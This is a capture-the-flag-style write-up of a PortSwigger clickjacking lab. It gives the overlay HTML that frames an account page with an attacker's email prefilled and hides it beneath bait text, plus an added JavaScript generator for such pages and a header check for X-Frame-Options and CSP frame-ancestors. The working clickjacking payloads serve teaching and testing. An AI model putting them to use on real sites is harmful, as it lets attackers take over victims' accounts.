PortSwigger Lab Write-Up: Clickjacking with Prefilled Form Input Data from URL Parameters

In this apprentice-level lab, we take advantage of the change-email flow of a website that is vulnerable to clickjacking: the account page can be loaded in a frame, and its email field can be prefilled through a URL parameter.


After logging in with the given credentials and opening the account page, we find an Update Email button, and the email input can be prefilled by appending a parameter to the URL (for example ?email=...). Let's use the standard clickjacking template to craft our exploit:

<head>
    <style>
        iframe {
            position:relative;
            width:700px;
            height:600px;
            opacity:0.1;
            z-index:2;
        }
        div {
            position:absolute;
            z-index:1;
        }
    </style>
</head>
<body>
    <div>
        CLICK HERE
    </div>
    <!-- ${LAB_ACCOUNT_ROUTE_URL} is a placeholder for the lab's account page URL -->
    <iframe src="${LAB_ACCOUNT_ROUTE_URL}?email=attacker@email.com">
    </iframe>
</body>

Here’s what this template looks like on our exploit server:

We need to move the CLICK HERE div so that it sits on top of the Update Email button on the vulnerable site. Note that the iframe opacity is set to 0.1 so that we can see the framed page through the overlay while aligning it. We then adjust the top and left CSS properties of the div so that when a logged-in user clicks CLICK HERE on our page, the click actually lands on the vulnerable site's button and submits the email we set in the URL parameter. The div sits beneath the iframe (z-index 1 versus 2), so it is the iframe, not the div, that receives the click. With top set to 450px and left to 50px, the bait text and the button line up. At this point, our exploit looks like this:

<head>
    <style>
        iframe {
            position:relative;
            width:700px;
            height:600px;
            opacity:0.1;
            z-index:2;
        }
        div {
            position:absolute;
            z-index:1;
            top:450px;
            left:50px;
        }
    </style>
</head>
<body>
    <div>
        CLICK HERE
    </div>
    <!-- ${LAB_ACCOUNT_ROUTE_URL} is a placeholder for the lab's account page URL -->
    <iframe src="${LAB_ACCOUNT_ROUTE_URL}?email=attacker@email.com">
    </iframe>
</body>

All that is left is to set the iframe opacity to 0.00001 or similar so that the frame is almost invisible, store the exploit, and deliver it to the victim. The attack only works because the account page is served without an X-Frame-Options header or a Content-Security-Policy frame-ancestors directive; either one would stop the page from being framed by our exploit server.
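The three steps above (frame the prefilled account page, position the bait over the button, then drop the opacity) as one added JavaScript example; this is not code from the write-up or from PortSwigger. It generates the overlay page from parameters, URL-encoding the prefilled value, and adds the check a tester runs before bothering with offsets: whether the target's response headers let the attacker origin frame it at all, including the CSP frame-ancestors rules that override X-Frame-Options. The target URL, exploit-server origin and header samples are constructed placeholders.

```javascript
// Added example for this write-up (not the author's or PortSwigger's code).
// Builds the clickjacking overlay page from parameters and checks, from a
// response's headers, whether an attacker origin may frame the target at all.
// The target URL, exploit-server origin and header samples are constructed.

const TARGET_ACCOUNT_URL = "https://target.example/my-account"; // hypothetical account page
const EXPLOIT_ORIGIN = "https://exploit.example";               // hypothetical exploit server
const TARGET_ORIGIN = new URL(TARGET_ACCOUNT_URL).origin;

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Overlay page: `prefill` becomes query parameters on the framed URL (the
// target's own prefill-from-URL behaviour fills the form), `top`/`left` put
// the bait text over the submit button, and the iframe sits above the bait
// (z-index 2 vs 1) so the victim's click lands in the frame.
function buildClickjackPage({ target, prefill, top, left, bait = "CLICK HERE",
                              width = 700, height = 600, opacity = 0.00001 }) {
  const url = new URL(target);
  for (const [k, v] of Object.entries(prefill)) url.searchParams.set(k, v); // encodes "@" as %40
  return `<!DOCTYPE html>
<html>
<head>
  <style>
    iframe { position:relative; width:${width}px; height:${height}px; opacity:${opacity}; z-index:2; }
    div { position:absolute; z-index:1; top:${top}px; left:${left}px; }
  </style>
</head>
<body>
  <div>${escapeHtml(bait)}</div>
  <iframe src="${escapeHtml(url.href)}"></iframe>
</body>
</html>`;
}

// Does a single CSP source expression allow the embedder `att` (a URL object)?
function matchesSource(src, att, targetOrigin) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return att.origin === targetOrigin;
  if (s === "*") return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return att.protocol === s; // scheme-source, e.g. "https:"
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)(?::(\d+|\*))?$/);
  if (!m) return false; // anything this parser does not understand is treated as no match
  const [, scheme, wildcard, host, port] = m;
  if (scheme && att.protocol !== scheme + ":") return false;
  if (!(wildcard ? att.hostname.endsWith("." + host) : att.hostname === host)) return false;
  if (port && port !== "*") {
    const attPort = att.port || (att.protocol === "https:" ? "443" : "80");
    if (attPort !== port) return false;
  }
  return true;
}

// May `attackerOrigin` embed a page of `targetOrigin` served with these
// (lower-cased, as Node's http module returns them) response headers?
// A CSP frame-ancestors directive, when present, overrides X-Frame-Options;
// frame-ancestors does NOT fall back to default-src, so a CSP without it
// leaves framing unrestricted. With several policies, every one must allow it.
function frameableBy(headers, attackerOrigin, targetOrigin) {
  const att = new URL(attackerOrigin);
  const policies = String(headers["content-security-policy"] || "").split(",");
  const frameAncestors = policies
    .map((p) => p.split(";").map((d) => d.trim()).find((d) => /^frame-ancestors(\s|$)/i.test(d)))
    .filter(Boolean);
  if (frameAncestors.length > 0) {
    return frameAncestors.every((d) =>
      d.split(/\s+/).slice(1).some((src) => matchesSource(src, att, targetOrigin)));
  }
  const xfo = String(headers["x-frame-options"] || "").trim().toLowerCase();
  if (xfo === "deny") return false;
  if (xfo === "sameorigin") return att.origin === targetOrigin;
  return true; // absent, or a value browsers ignore (including the obsolete ALLOW-FROM)
}

// Constructed header samples for the check above.
const SAMPLES = {
  none: {},
  deny: { "x-frame-options": "DENY" },
  sameorigin: { "x-frame-options": "SAMEORIGIN" },
  cspTrusted: { "content-security-policy": "default-src 'self'; frame-ancestors 'self' https://*.trusted.example" },
  cspNoFrameAncestors: { "content-security-policy": "default-src 'self'" },
  cspOverridesXfo: { "x-frame-options": "SAMEORIGIN", "content-security-policy": "frame-ancestors 'none'" },
};

// The lab scenario: an account page with no framing protection, framed with the
// attacker's address prefilled and the bait placed at the offsets found above.
function labScenario(headers = SAMPLES.none) {
  const frameable = frameableBy(headers, EXPLOIT_ORIGIN, TARGET_ORIGIN);
  const page = frameable
    ? buildClickjackPage({ target: TARGET_ACCOUNT_URL, prefill: { email: "attacker@email.com" }, top: 450, left: 50 })
    : null;
  return { frameable, page };
}
```

Running labScenario() with the empty header set returns the finished overlay page with the email already encoded as attacker%40email.com in the iframe src; the same call against the DENY or SAMEORIGIN samples returns no page, which is the point at which a tester stops and reports the target as not frameable rather than fiddling with offsets.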

Check out this article on The Art of Code: https://artofcode.tech/portswigger-lab-write-up-clickjacking-with-form-input-data-prefill-from-a-url-parameter/

Github: https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/clickjacking/clickjacking-with-form-input-data-prefilled-from-a-url-parameter
